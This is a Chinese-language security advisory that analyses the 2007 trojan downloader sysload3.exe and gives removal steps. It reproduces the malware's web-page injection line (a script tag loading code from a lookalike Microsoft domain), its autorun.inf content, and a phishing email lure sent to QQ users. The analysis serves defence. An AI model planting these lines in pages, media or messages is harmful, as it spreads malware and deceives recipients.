sysload3.exe 解决方案

2023-01-31 00:01:33 exe 解决方案 sysload3
 
档案编号:CISRT2007041
病毒名称:Trojan-Downloader.Win32.Agent.bky(Kaspersky)
病毒别名:WORM.DlOnlineGames.a(瑞星)
      Win32.MyInfect.af.16384(毒霸)
病毒大小:13,824 字节
      13,312 字节
加壳方式
样本MD5:1d9ad0c63ff4b43c28052db0f0cd23ae
      e9100ce97a5b4fbd8857b25ffe2d7179
样本SHA1:8da40bc9d27e5d3707b0cc9710b5528c1b8e7404
      a0a32e4bea2c3b366c0e0433f17ef9c9f9b41104
发现时间:2007.3
更新时间:2007.3.30
关联病毒
传播方式:通过恶意网站传播,利用ani漏洞,感染exe可执行文件,修改htm等网页文件,发送邮件


技术分析
==========

病毒运行后复制自身到系统目录:
%System%\sysload3.exe

创建自启动项:

[Copy to clipboard]
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
"System Boot Check"="%System%\sysload3.exe"

调用IE进程(iexplore.exe)访问网络下载病毒配置信息,保存为%System%\config.ini,开启记事本(notepad.exe)进程开始感一系列病毒动作。

感染系统分区以外的.EXE文件,感染过程中会产生临时文件%System%\tempIcon.exe%System%\tempload.exe%System%\tempIcon.exe是病毒副本+被感染exe文件图标,添加到被感染exe文件前端;被感染exe文件尾部也增加8字节。

修改网页文件,

QUOTE:
.HTM
.html
.ASP
.ASPX
.PHP
.jsP

在这些文件的<body>代码后添加指向恶意地址的代码:

[Copy to clipboard]
CODE:
<script src=Http://Macr.microfsot.com/Noindex.js></script>

尝试向A驱动器复制病毒副本:
A:\tool.exe
A:\autorun.inf

autorun.inf内容:

[Copy to clipboard]
CODE:
[autorun]
Open=tool.exe
shellexecute=tool.exe
Shell\0\command = tool.exe
Shell\0= 打开

尝试向QQ信箱发送邮件,QQ号码随机产生,正文里附带含有利用ani漏洞的恶意网页地址。

QUOTE:
发件人:[email]i_love_cq@sohu.com[/email]
收件人:[随机数字]@qq.com
主题:你和谁视频的时候被拍下的?给你笑死了!
正文:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
[url]http://macr.microfsot.com/20070326/134952.htm[/url]

修改hosts文件,屏蔽一些域名,其中也包括其它同类病毒的下载域名。

病毒内文字信息:

QUOTE:
OK BMW  xV4



QUOTE:
I will by one BMW this year!    xV4

Mutex:MyInfect


清除步骤
==========

1. 结束notepad.exe进程和iexplore.exe进程

2. 删除病毒自启动项:

[Copy to clipboard]
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"System Boot Check"="%System%\sysload3.exe"

3. 删除文件:
%System%\sysload3.exe
%System%\config.ini

4. 使用反病毒软件进行全盘扫描,清除被感染的exe和网页文件

相关文章